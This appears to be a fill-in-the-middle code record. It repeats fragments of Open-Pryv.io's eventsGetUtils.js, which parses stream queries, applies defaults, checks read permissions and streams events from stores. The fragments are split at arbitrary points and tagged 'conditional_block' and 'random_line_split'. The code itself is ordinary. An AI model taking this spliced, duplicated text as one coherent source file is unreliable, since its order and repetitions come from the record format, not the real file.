return JSON.parse(input);
} catch (e) {
throw errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query. Error while parsing JSON ' + e, input);
}
}
/**
* we detect if it's JSON by looking at first char.
* Note: since RFC 7159 JSON can also starts with ", true, false or number - this does not apply in this case.
* @param {string} input
*/
function isStringifiedJSON(input: any): boolean {
return (typeof input === 'string') && ['[', '{'].includes(input.substr(0, 1));
}
function isStringOrArrayOfStrings(input: any): boolean {
if (typeof input === 'string') return true;
if (! Array.isArray(input)) return false;
for (const item of input) {
if (typeof item !== 'string') return false;
}
return true;
}
}
async function applyDefaultsForRetrieval(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
_.defaults(params, {
streams: [{ any: ['*'] }],
tags: null,
types: null,
fromTime: null,
toTime: null,
sortAscending: false,
skip: null,
limit: null,
state: 'default',
modifiedSince: null,
includeDeletions: false
});
if (params.fromTime == null && params.toTime != null) {
params.fromTime = timestamp.add(params.toTime, -24 * 60 * 60);
}
if (params.fromTime != null && params.toTime == null) {
params.toTime = timestamp.now();
}
if (params.fromTime == null && params.toTime == null && params.limit == null) {
// limit to 20 items by default
params.limit = 20;
}
next();
}
function transformArrayOfStringsToStreamsQuery(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
try {
params.arrayOfStreamQueries = streamsQueryUtils.transformArrayOfStringsToStreamsQuery(params.streams);
} catch (e) {
return next(errors.invalidRequestStructure(e, params.streams));
}
next();
}
function validateStreamsQueriesAndSetStore(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
try {
streamsQueryUtils.validateStreamsQueriesAndSetStore(params.arrayOfStreamQueries);
params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueries;
} catch (e) {
return next(errors.invalidRequestStructure('Initial filtering: ' + e, params.streams));
}
next();
}
// the two tasks are joined as '*' replaced have their permissions checked
async function streamQueryCheckPermissionsAndReplaceStars(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
context.tracing.startSpan('streamQueries');
const unAuthorizedStreamIds: Array<string> = [];
const unAccessibleStreamIds: Array<string> = [];
async function streamExistsAndCanGetEventsOnStream(streamId: string, storeId: string,
unAuthorizedStreamIds: Array<string>, unAccessibleStreamIds: Array<string>): Promise<void> {
// remove eventual '#' in streamQuery
const cleanStreamId: string = streamId.startsWith('#') ? streamId.substr(1) : streamId;
const stream: Stream = await context.streamForStreamId(cleanStreamId, storeId);
if (stream == null) {
unAccessibleStreamIds.push(cleanStreamId);
return;
}
if (! await context.access.canGetEventsOnStream(cleanStreamId, storeId)) {
unAuthorizedStreamIds.push(cleanStreamId);
}
}
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ "*" case
if (streamQuery.any && streamQuery.any.includes('*')) {
if (await context.access.canGetEventsOnStream('*', streamQuery.storeId)) continue; // We can keep star
// replace any by allowed streams for reading
const canReadStreamIds: Array<string> = [];
for (const streamPermission of context.access.getStoresPermissions(streamQuery.storeId)) {
if (await context.access.canGetEventsOnStream(streamPermission.streamId, streamQuery.storeId)) {
canReadStreamIds.push(streamPermission.streamId);
}
}
streamQuery.any = canReadStreamIds;
} else { // ------------ All other cases
/**
* ! we don't have to check for permissions on 'all' or 'not' as long there is at least one 'any' authorized.
*/
if (streamQuery?.any?.length === 0) {
return next(errors.invalidRequestStructure('streamQueries must have a valid {any: [...]} component'));
}
for (const streamId: string of streamQuery.any) {
await streamExistsAndCanGetEventsOnStream(streamId, streamQuery.storeId, unAuthorizedStreamIds, unAccessibleStreamIds);
};
}
}
if (unAuthorizedStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.forbidden('stream [' + unAuthorizedStreamIds[0] + '] has not sufficent permission to get events'));
}
if (unAccessibleStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.unknownReferencedResource(
'stream' + (unAccessibleStreamIds.length > 1 ? 's' : ''),
'streams',
unAccessibleStreamIds));
}
next();
}
/**
* Add "forced" and "none" events from permissions
*/
function streamQueryAddForcedAndForbiddenStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ ALL --------------- //
// add forced Streams if exists
const forcedStreamIds: Array<string> = context.access.getForcedStreamsGetEventsStreamIds(streamQuery.storeId);
if (forcedStreamIds?.length > 0) {
if (streamQuery.all == null) streamQuery.all = [];
// TODO check for duplicates
streamQuery.all.push(...forcedStreamIds);
}
// ------------- NOT ------------- //
const forbiddenStreamIds: Array<string> = context.access.getForbiddenGetEventsStreamIds(streamQuery.storeId);
if (forbiddenStreamIds?.length > 0) {
if (streamQuery.not == null) streamQuery.not = [];
// TODO check for duplicates
streamQuery.not.push(...forbiddenStreamIds);
}
}
next();
}
async function streamQueryExpandStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
async function expandStreamInContext(streamId: string, storeId: string, excludedIds) {
// remove eventual '#' in streamQuery
if (streamId.startsWith('#')) {
return [streamId.substr(1)]; // do not expand Stream
}
const query: StoreQuery = {
id: streamId,
storeId: storeId,
includeTrashed: params.state === 'all' || params.state === 'trashed',
expandChildren: true,
excludedIds: excludedIds
};
const tree: Array<Stream> = await mall.streams.get(context.user.id, query);
// collect streamIds
const resultWithPrefix: Array<string> = treeUtils.collectPluck(tree, 'id');
// remove storePrefix
const result: Array<string> = resultWithPrefix.map((fullStreamId: string) => StreamsUtils.storeIdAndStreamIdForStreamId(fullStreamId)[1]);
return result;
}
try {
params.arrayOfStreamQueriesWithStoreId = await streamsQueryUtils.expandAndTransformStreamQueries(params.arrayOfStreamQueriesWithStoreId, expandStreamInContext);
} catch (e) {
console.log(e);
context.tracing.finishSpan('streamQueries');
return next(e);
}
// delete streamQueries with no inclusions
params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueriesWithStoreId.filter(streamQuery => streamQuery.any != null || streamQuery.and != null);
context.tracing.finishSpan('streamQueries');
next();
}
/**
* - Create a copy of the params per query
* - Add specific stream queries to each of them
*/
async function findEventsFromStore(filesReadTokenSecret: string,
isStreamIdPrefixBackwardCompatibilityActive: boolean, isTagsBackwardCompatibilityActive: boolean,
context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.arrayOfStreamQueriesWithStoreId?.length === 0) {
result.events = [];
return next();
}
// in> params.fromTime = 2 params.streams = [{any: '*' storeId: 'local'}, {any: 'access-gasgsg', storeId: 'audit'}, {any: 'action-events.get', storeId: 'audit'}]
const paramsByStoreId: Map<string, GetEventsParams> = {};
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
const storeId: string = streamQuery.storeId;
if (storeId == null) {
console.error('Missing storeId' + params.arrayOfStreamQueriesWithStoreId);
throw(new Error("Missing storeId" + params.arrayOfStreamQueriesWithStoreId));
}
if (paramsByStoreId[storeId] == null) {
paramsByStoreId[storeId] = _.cloneDeep(params); // copy the parameters
paramsByStoreId[storeId].streams = []; // empty the stream query
}
delete streamQuery.storeId;
paramsByStoreId[storeId].streams.push(streamQuery);
}
// out> paramsByStoreId = { local: {fromTime: 2, streams: [{any: '*}]}, audit: {fromTime: 2, streams: [{any: 'access-gagsg'}, {any: 'action-events.get}]}
/**
* Will be called by "mall" for each source of event that need to be streames to result
* @param {Store} store
* @param {ReadableStream} eventsStream of "Events"
*/
function addnewEventStreamFromSource (store, eventsStream: ReadableStream) {
let stream: ReadableStream = eventsStream;
if (isStreamIdPrefixBackwardCompatibilityActive && !context.disableBackwardCompatibility) {
stream = eventsStream.pipe(new ChangeStreamIdPrefixStream());
}
if (isTagsBackwardCompatibilityActive) {
stream = stream.pipe(new addTagsStream());
}
stream = stream.pipe(new SetSingleStreamIdStream());
if (store.settings?.attachments?.setFileReadToken) {
stream = stream.pipe(new SetFileReadTokenStream({ access: context.access, filesReadTokenSecret }));
}
result.addToConcatArrayStream('events', stream);
}
await mall.events.generateStreams(context.user.id, paramsByStoreId, addnewEventStreamFromSource);
result.closeConcatArrayStream('events');
return next();
}
async function init() {
mall = await getMall();
}
module.exports = {
init,
applyDefaultsForRetrieval,
coerceStreamsParam,
validateStreamsQueriesAndSetStore,
transformArrayOfStringsToStreamsQuery,
streamQueryCheckPermissionsAndReplaceStars,
streamQueryAddForcedAndForbiddenStreams,
streamQueryExpandStreams,
findEventsFromStore,
} | return next();
}
| conditional_block |
eventsGetUtils.js | /**
* @license
* Copyright (C) 2020-2021 Pryv S.A. https://pryv.com
*
* This file is part of Open-Pryv.io and released under BSD-Clause-3 License
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* 3. Neither the name of the copyright holder nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* SPDX-License-Identifier: BSD-3-Clause
*/
// @flow
/**
* Some method used by events.get are shared with audit.getLogs
*/
const streamsQueryUtils = require('./streamsQueryUtils');
const _ = require('lodash');
const timestamp = require('unix-timestamp');
const errors = require('errors').factory;
const { getMall, StreamsUtils } = require('mall');
const { treeUtils } = require('utils');
const SetFileReadTokenStream = require('../streams/SetFileReadTokenStream');
const SetSingleStreamIdStream = require('../streams/SetSingleStreamIdStream');
const ChangeStreamIdPrefixStream = require('../streams/ChangeStreamIdPrefixStream');
const addTagsStream = require('../streams/AddTagsStream');
import type { Stream } from 'business/src/streams';
import type { StreamQuery, StreamQueryWithStoreId } from 'business/src/events';
import type { MethodContext } from 'business';
import type { ApiCallback } from '../../API';
import type Result from '../../Result';
export type GetEventsParams = {
streams?: Array<string> | string | StreamQuery | Array<StreamQuery>,
arrayOfStreamQueries?: Array<StreamQuery>,
arrayOfStreamQueriesWithStoreId?: Array<StreamQueryWithStoreId>,
tags?: Array<string>,
types?: Array<string>,
fromTime?: number,
toTime?: number,
sortAscending?: boolean,
skip?: number,
limit?: number,
state?: 'default' | 'all' | 'trashed',
modifiedSince?: number,
includeDeletions?: boolean,
};
export type StoreQuery = {
id: string,
storeId: string,
includeTrashed: boolean,
expandChildren: boolean,
excludedIds: Array<string>,
};
let mall;
/**
* # Stream Query Flow
* 1. coerceStreamParam:
* - null `streams` is changed to `[{any: ['*]}]
* - transform "stringified" `streams` by parsing JSON object
*
* 2. transformArrayOfStringsToStreamsQuery:
* For backwardCompatibility with older streams parameter ['A', 'B']
* - `streams: ['A', 'B', 'C']` => `streams: [{any: 'A'}, {any: 'B'}, {any: 'C'}]`
*
* 3. validateStreamsQueriesAndSetStore:
* - Check syntax and add storeId
* `streams: [{any: 'A'}, {any: ':_audit:B'}]` => `streams: [{any: 'A', storeId: 'local'}, {any: 'B', storeId: 'audit'}]`
*
* 4. streamQueryCheckPermissionsAndReplaceStars:
* For `stream.any`ONLY ! (we don't have to check NOT and ALL query as they only reduce scope)
* - check if stream exits and if has "read" access
* - If "stream.any" contains "*" it's replaced by all root streams with "read" rights
*
* 5. streamQueryAddForcedAndForbiddenStreams
* - Add to streams query `all` streams declared as "forced"
* - Add to streams query `not` streams that must not be exposed permissions => with level = "none"
*
* 6. streamQueryExpandStreams
* - Each "streamId" of the queries is "expanded" (i.e. transformed in an array of streamId that includes the streams and it's chidlren)
* - Do not expand streams prefixed with a "#"
*
* - A callBack `expandStreamInContext`is used to link the expand process and the "store"
* This callBack is designed to be optimized on a Per-Store basis The current implementation is generic
* - If streamId is prefixed with a "#" just return the streamId without "#"
* - It queries the stores with and standard `store.streams.get({id: streamId, exludedIds: [....]})`
* and return an array of streams.
*
* - streamsQueryUtils.expandAndTransformStreamQueries
* Is in charge of handling 'any', 'all' and 'not' "expand" process
*
* - "any" is expanded first excluding streamIds in "not"
* => The result is kept in `any`
* - "all" is expanded in second excluding streamIds in "not"
* `all` is tranformed and each "expansion" is kept in `and: [{any: ,..}]`
* example: `{all: ['A', 'B']}` => `{and: [{any: [...expand('A')]}, {any: [...expand('B')]}]}`
* - "not" is expanded in third and added to `and` -- !! we exclude streamIds that are in 'any' as some authorization might have been given on child now expanded
* example: `{all: ['A'], not['B', 'C']}` => `{and: [{any: [...expand('A')]}, {not: [...expand('B')...expand('C')]}]}
*
*/
function coerceStreamsParam(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.streams == null) {
return next();
}
if (! context.acceptStreamsQueryNonStringified) {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else if (isStringOrArrayOfStrings(params.streams)) {
// good, do nothing
} else {
return next(errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query.'))
}
} else {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else {
// good, do nothing
}
}
// Transform object or string to Array
if (!Array.isArray(params.streams)) {
params.streams = [params.streams];
}
next();
function parseStreamsParams(input: string): ?StreamQuery | ?Array<StreamQuery> {
try {
return JSON.parse(input);
} catch (e) {
throw errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query. Error while parsing JSON ' + e, input);
}
}
/**
* we detect if it's JSON by looking at first char.
* Note: since RFC 7159 JSON can also starts with ", true, false or number - this does not apply in this case.
* @param {string} input
*/
function isStringifiedJSON(input: any): boolean {
return (typeof input === 'string') && ['[', '{'].includes(input.substr(0, 1));
}
function isStringOrArrayOfStrings(input: any): boolean {
if (typeof input === 'string') return true;
if (! Array.isArray(input)) return false;
for (const item of input) {
if (typeof item !== 'string') return false;
}
return true;
}
}
async function applyDefaultsForRetrieval(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
_.defaults(params, {
streams: [{ any: ['*'] }],
tags: null,
types: null,
fromTime: null,
toTime: null,
sortAscending: false,
skip: null,
limit: null,
state: 'default',
modifiedSince: null,
includeDeletions: false
});
if (params.fromTime == null && params.toTime != null) {
params.fromTime = timestamp.add(params.toTime, -24 * 60 * 60);
}
if (params.fromTime != null && params.toTime == null) {
params.toTime = timestamp.now();
}
if (params.fromTime == null && params.toTime == null && params.limit == null) {
// limit to 20 items by default
params.limit = 20;
}
next();
}
function transformArrayOfStringsToStreamsQuery(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
try {
params.arrayOfStreamQueries = streamsQueryUtils.transformArrayOfStringsToStreamsQuery(params.streams);
} catch (e) {
return next(errors.invalidRequestStructure(e, params.streams));
}
next();
}
function validateStreamsQueriesAndSetStore(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
try {
streamsQueryUtils.validateStreamsQueriesAndSetStore(params.arrayOfStreamQueries);
params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueries;
} catch (e) {
return next(errors.invalidRequestStructure('Initial filtering: ' + e, params.streams));
}
next();
}
// the two tasks are joined as '*' replaced have their permissions checked
async function streamQueryCheckPermissionsAndReplaceStars(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
context.tracing.startSpan('streamQueries');
const unAuthorizedStreamIds: Array<string> = [];
const unAccessibleStreamIds: Array<string> = [];
async function streamExistsAndCanGetEventsOnStream(streamId: string, storeId: string,
unAuthorizedStreamIds: Array<string>, unAccessibleStreamIds: Array<string>): Promise<void> {
// remove eventual '#' in streamQuery
const cleanStreamId: string = streamId.startsWith('#') ? streamId.substr(1) : streamId;
const stream: Stream = await context.streamForStreamId(cleanStreamId, storeId);
if (stream == null) {
unAccessibleStreamIds.push(cleanStreamId);
return;
}
if (! await context.access.canGetEventsOnStream(cleanStreamId, storeId)) {
unAuthorizedStreamIds.push(cleanStreamId);
}
}
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ "*" case
if (streamQuery.any && streamQuery.any.includes('*')) {
if (await context.access.canGetEventsOnStream('*', streamQuery.storeId)) continue; // We can keep star
// replace any by allowed streams for reading
const canReadStreamIds: Array<string> = [];
for (const streamPermission of context.access.getStoresPermissions(streamQuery.storeId)) {
if (await context.access.canGetEventsOnStream(streamPermission.streamId, streamQuery.storeId)) {
canReadStreamIds.push(streamPermission.streamId);
}
}
streamQuery.any = canReadStreamIds;
} else { // ------------ All other cases
/**
* ! we don't have to check for permissions on 'all' or 'not' as long there is at least one 'any' authorized.
*/
if (streamQuery?.any?.length === 0) {
return next(errors.invalidRequestStructure('streamQueries must have a valid {any: [...]} component'));
}
for (const streamId: string of streamQuery.any) {
await streamExistsAndCanGetEventsOnStream(streamId, streamQuery.storeId, unAuthorizedStreamIds, unAccessibleStreamIds);
};
}
}
if (unAuthorizedStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.forbidden('stream [' + unAuthorizedStreamIds[0] + '] has not sufficent permission to get events'));
}
if (unAccessibleStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.unknownReferencedResource(
'stream' + (unAccessibleStreamIds.length > 1 ? 's' : ''),
'streams',
unAccessibleStreamIds));
}
next();
}
/**
* Add "forced" and "none" events from permissions
*/
function streamQueryAddForcedAndForbiddenStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ ALL --------------- //
// add forced Streams if exists
const forcedStreamIds: Array<string> = context.access.getForcedStreamsGetEventsStreamIds(streamQuery.storeId);
if (forcedStreamIds?.length > 0) {
if (streamQuery.all == null) streamQuery.all = [];
// TODO check for duplicates
streamQuery.all.push(...forcedStreamIds);
}
// ------------- NOT ------------- //
const forbiddenStreamIds: Array<string> = context.access.getForbiddenGetEventsStreamIds(streamQuery.storeId);
if (forbiddenStreamIds?.length > 0) {
if (streamQuery.not == null) streamQuery.not = [];
// TODO check for duplicates
streamQuery.not.push(...forbiddenStreamIds);
}
}
next();
}
async function streamQueryExpandStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
async function expandStreamInContext(streamId: string, storeId: string, excludedIds) {
// remove eventual '#' in streamQuery
if (streamId.startsWith('#')) {
return [streamId.substr(1)]; // do not expand Stream
}
const query: StoreQuery = {
id: streamId,
storeId: storeId,
includeTrashed: params.state === 'all' || params.state === 'trashed',
expandChildren: true,
excludedIds: excludedIds
};
const tree: Array<Stream> = await mall.streams.get(context.user.id, query);
// collect streamIds
const resultWithPrefix: Array<string> = treeUtils.collectPluck(tree, 'id');
// remove storePrefix
const result: Array<string> = resultWithPrefix.map((fullStreamId: string) => StreamsUtils.storeIdAndStreamIdForStreamId(fullStreamId)[1]);
return result;
}
try {
params.arrayOfStreamQueriesWithStoreId = await streamsQueryUtils.expandAndTransformStreamQueries(params.arrayOfStreamQueriesWithStoreId, expandStreamInContext);
} catch (e) {
console.log(e);
context.tracing.finishSpan('streamQueries');
return next(e);
}
// delete streamQueries with no inclusions
params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueriesWithStoreId.filter(streamQuery => streamQuery.any != null || streamQuery.and != null);
context.tracing.finishSpan('streamQueries');
next();
} | * - Add specific stream queries to each of them
*/
async function findEventsFromStore(filesReadTokenSecret: string,
isStreamIdPrefixBackwardCompatibilityActive: boolean, isTagsBackwardCompatibilityActive: boolean,
context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.arrayOfStreamQueriesWithStoreId?.length === 0) {
result.events = [];
return next();
}
// in> params.fromTime = 2 params.streams = [{any: '*' storeId: 'local'}, {any: 'access-gasgsg', storeId: 'audit'}, {any: 'action-events.get', storeId: 'audit'}]
const paramsByStoreId: Map<string, GetEventsParams> = {};
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
const storeId: string = streamQuery.storeId;
if (storeId == null) {
console.error('Missing storeId' + params.arrayOfStreamQueriesWithStoreId);
throw(new Error("Missing storeId" + params.arrayOfStreamQueriesWithStoreId));
}
if (paramsByStoreId[storeId] == null) {
paramsByStoreId[storeId] = _.cloneDeep(params); // copy the parameters
paramsByStoreId[storeId].streams = []; // empty the stream query
}
delete streamQuery.storeId;
paramsByStoreId[storeId].streams.push(streamQuery);
}
// out> paramsByStoreId = { local: {fromTime: 2, streams: [{any: '*}]}, audit: {fromTime: 2, streams: [{any: 'access-gagsg'}, {any: 'action-events.get}]}
/**
* Will be called by "mall" for each source of event that need to be streames to result
* @param {Store} store
* @param {ReadableStream} eventsStream of "Events"
*/
function addnewEventStreamFromSource (store, eventsStream: ReadableStream) {
let stream: ReadableStream = eventsStream;
if (isStreamIdPrefixBackwardCompatibilityActive && !context.disableBackwardCompatibility) {
stream = eventsStream.pipe(new ChangeStreamIdPrefixStream());
}
if (isTagsBackwardCompatibilityActive) {
stream = stream.pipe(new addTagsStream());
}
stream = stream.pipe(new SetSingleStreamIdStream());
if (store.settings?.attachments?.setFileReadToken) {
stream = stream.pipe(new SetFileReadTokenStream({ access: context.access, filesReadTokenSecret }));
}
result.addToConcatArrayStream('events', stream);
}
await mall.events.generateStreams(context.user.id, paramsByStoreId, addnewEventStreamFromSource);
result.closeConcatArrayStream('events');
return next();
}
async function init() {
mall = await getMall();
}
module.exports = {
init,
applyDefaultsForRetrieval,
coerceStreamsParam,
validateStreamsQueriesAndSetStore,
transformArrayOfStringsToStreamsQuery,
streamQueryCheckPermissionsAndReplaceStars,
streamQueryAddForcedAndForbiddenStreams,
streamQueryExpandStreams,
findEventsFromStore,
} |
/**
* - Create a copy of the params per query | random_line_split |
eventsGetUtils.js | /**
* @license
* Copyright (C) 2020-2021 Pryv S.A. https://pryv.com
*
* This file is part of Open-Pryv.io and released under BSD-Clause-3 License
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* 3. Neither the name of the copyright holder nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* SPDX-License-Identifier: BSD-3-Clause
*/
// @flow
/**
* Some method used by events.get are shared with audit.getLogs
*/
const streamsQueryUtils = require('./streamsQueryUtils');
const _ = require('lodash');
const timestamp = require('unix-timestamp');
const errors = require('errors').factory;
const { getMall, StreamsUtils } = require('mall');
const { treeUtils } = require('utils');
const SetFileReadTokenStream = require('../streams/SetFileReadTokenStream');
const SetSingleStreamIdStream = require('../streams/SetSingleStreamIdStream');
const ChangeStreamIdPrefixStream = require('../streams/ChangeStreamIdPrefixStream');
const addTagsStream = require('../streams/AddTagsStream');
import type { Stream } from 'business/src/streams';
import type { StreamQuery, StreamQueryWithStoreId } from 'business/src/events';
import type { MethodContext } from 'business';
import type { ApiCallback } from '../../API';
import type Result from '../../Result';
export type GetEventsParams = {
streams?: Array<string> | string | StreamQuery | Array<StreamQuery>,
arrayOfStreamQueries?: Array<StreamQuery>,
arrayOfStreamQueriesWithStoreId?: Array<StreamQueryWithStoreId>,
tags?: Array<string>,
types?: Array<string>,
fromTime?: number,
toTime?: number,
sortAscending?: boolean,
skip?: number,
limit?: number,
state?: 'default' | 'all' | 'trashed',
modifiedSince?: number,
includeDeletions?: boolean,
};
export type StoreQuery = {
id: string,
storeId: string,
includeTrashed: boolean,
expandChildren: boolean,
excludedIds: Array<string>,
};
let mall;
/**
* # Stream Query Flow
* 1. coerceStreamParam:
* - null `streams` is changed to `[{any: ['*]}]
* - transform "stringified" `streams` by parsing JSON object
*
* 2. transformArrayOfStringsToStreamsQuery:
* For backwardCompatibility with older streams parameter ['A', 'B']
* - `streams: ['A', 'B', 'C']` => `streams: [{any: 'A'}, {any: 'B'}, {any: 'C'}]`
*
* 3. validateStreamsQueriesAndSetStore:
* - Check syntax and add storeId
* `streams: [{any: 'A'}, {any: ':_audit:B'}]` => `streams: [{any: 'A', storeId: 'local'}, {any: 'B', storeId: 'audit'}]`
*
* 4. streamQueryCheckPermissionsAndReplaceStars:
* For `stream.any`ONLY ! (we don't have to check NOT and ALL query as they only reduce scope)
* - check if stream exits and if has "read" access
* - If "stream.any" contains "*" it's replaced by all root streams with "read" rights
*
* 5. streamQueryAddForcedAndForbiddenStreams
* - Add to streams query `all` streams declared as "forced"
* - Add to streams query `not` streams that must not be exposed permissions => with level = "none"
*
* 6. streamQueryExpandStreams
* - Each "streamId" of the queries is "expanded" (i.e. transformed in an array of streamId that includes the streams and it's chidlren)
* - Do not expand streams prefixed with a "#"
*
* - A callBack `expandStreamInContext`is used to link the expand process and the "store"
* This callBack is designed to be optimized on a Per-Store basis The current implementation is generic
* - If streamId is prefixed with a "#" just return the streamId without "#"
* - It queries the stores with and standard `store.streams.get({id: streamId, exludedIds: [....]})`
* and return an array of streams.
*
* - streamsQueryUtils.expandAndTransformStreamQueries
* Is in charge of handling 'any', 'all' and 'not' "expand" process
*
* - "any" is expanded first excluding streamIds in "not"
* => The result is kept in `any`
* - "all" is expanded in second excluding streamIds in "not"
* `all` is tranformed and each "expansion" is kept in `and: [{any: ,..}]`
* example: `{all: ['A', 'B']}` => `{and: [{any: [...expand('A')]}, {any: [...expand('B')]}]}`
* - "not" is expanded in third and added to `and` -- !! we exclude streamIds that are in 'any' as some authorization might have been given on child now expanded
* example: `{all: ['A'], not['B', 'C']}` => `{and: [{any: [...expand('A')]}, {not: [...expand('B')...expand('C')]}]}
*
*/
function coerceStreamsParam(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.streams == null) {
return next();
}
if (! context.acceptStreamsQueryNonStringified) {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else if (isStringOrArrayOfStrings(params.streams)) {
// good, do nothing
} else {
return next(errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query.'))
}
} else {
if (isStringifiedJSON(params.streams)) {
try {
params.streams = parseStreamsParams(params.streams);
} catch (e) {
return next(e);
}
} else {
// good, do nothing
}
}
// Transform object or string to Array
if (!Array.isArray(params.streams)) {
params.streams = [params.streams];
}
next();
function parseStreamsParams(input: string): ?StreamQuery | ?Array<StreamQuery> {
try {
return JSON.parse(input);
} catch (e) {
throw errors.invalidRequestStructure('Invalid "streams" parameter. It should be an array of streamIds or JSON logical query. Error while parsing JSON ' + e, input);
}
}
/**
* we detect if it's JSON by looking at first char.
* Note: since RFC 7159 JSON can also starts with ", true, false or number - this does not apply in this case.
* @param {string} input
*/
function isStringifiedJSON(input: any): boolean {
return (typeof input === 'string') && ['[', '{'].includes(input.substr(0, 1));
}
function isStringOrArrayOfStrings(input: any): boolean {
if (typeof input === 'string') return true;
if (! Array.isArray(input)) return false;
for (const item of input) {
if (typeof item !== 'string') return false;
}
return true;
}
}
async function applyDefaultsForRetrieval(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
_.defaults(params, {
streams: [{ any: ['*'] }],
tags: null,
types: null,
fromTime: null,
toTime: null,
sortAscending: false,
skip: null,
limit: null,
state: 'default',
modifiedSince: null,
includeDeletions: false
});
if (params.fromTime == null && params.toTime != null) {
params.fromTime = timestamp.add(params.toTime, -24 * 60 * 60);
}
if (params.fromTime != null && params.toTime == null) {
params.toTime = timestamp.now();
}
if (params.fromTime == null && params.toTime == null && params.limit == null) {
// limit to 20 items by default
params.limit = 20;
}
next();
}
